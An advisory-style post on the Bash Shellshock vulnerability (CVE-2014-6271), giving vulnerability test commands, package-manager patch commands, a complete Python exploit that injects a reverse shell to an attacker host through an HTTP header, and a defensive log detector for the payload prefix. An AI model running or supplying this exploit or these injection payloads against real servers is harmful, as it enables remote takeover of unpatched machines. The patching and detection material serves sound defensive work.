Stephane Chazelas, of the U.K. robotics company SeeByte, found a bug in Bash.
https://securityblog.redhat.com/
A quick test to check if you are vulnerable (Debian, Ubuntu, Unix (FreeBSD), ...):
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If your terminal responds with "vulnerable", you are vulnerable.
The problem is the following: the code continues to execute after the ";" that follows the function definition, and that is where malicious code can be injected.
There is also a CGI test:
wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test
You have to update Bash through your package manager in the next couple of days:
CentOS : # yum update bash
Debian : # apt-get update && apt-get install --only-upgrade bash
FreeBSD : # portsnap fetch update
Bash 4.3 patch: https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025
-------
Example of an attack that could be performed (in this example, a reverse shell via an HTTP header):
#CVE-2014-6271 cgi-bin reverse shell
import httplib,urllib,sys
if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
           "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
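
On the defensive side, requests like the CGI test and the header-based attack above leave the "() {" function-definition prefix in web server logs. The following detector is an added example, not part of the original post; it assumes Apache/nginx "combined" access logs, and the function name and the sample log lines (documentation IP addresses, payload strings taken from the tests above) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Bash treats an environment value that starts with "() {" as a function
# definition; CGI servers copy request headers into the environment.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

# Apache/nginx "combined" format: ip, ident, user, [time], "request",
# status, size, "referer", "user-agent". Quoted fields may hold \" escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + QUOTED + r')" '
    r'"(?P<agent>' + QUOTED + r')"'
)

def find_shellshock_probes(lines):
    """Return (line_no, client_ip, field, status) for every logged field
    that carries a Bash function-definition prefix."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        for field in ("request", "referer", "agent"):
            # Decode %-escapes so an encoded "%28%29%20%7B" is also caught.
            if FUNC_DEF.search(unquote(m.group(field))):
                hits.append((line_no, m.group("ip"), field, m.group("status")))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/test HTTP/1.1" 200 0 "-" "() { test;};/usr/bin/touch /tmp/VULNERABLE"',
    '198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/test HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.38"',
    '203.0.113.4 - - [25/Sep/2014:10:02:00 +0000] "GET /js/app.js?cb=f() HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, ip, field, status in find_shellshock_probes(SAMPLE_LOG):
        print("line %d: %s sent a function definition in %s (HTTP %s)"
              % (line_no, ip, field, status))
```

The combined format records only the request line, Referer and User-Agent, so a payload sent in any other header (such as the "test" header used in the script above) is invisible to this check unless that header is added to the log format.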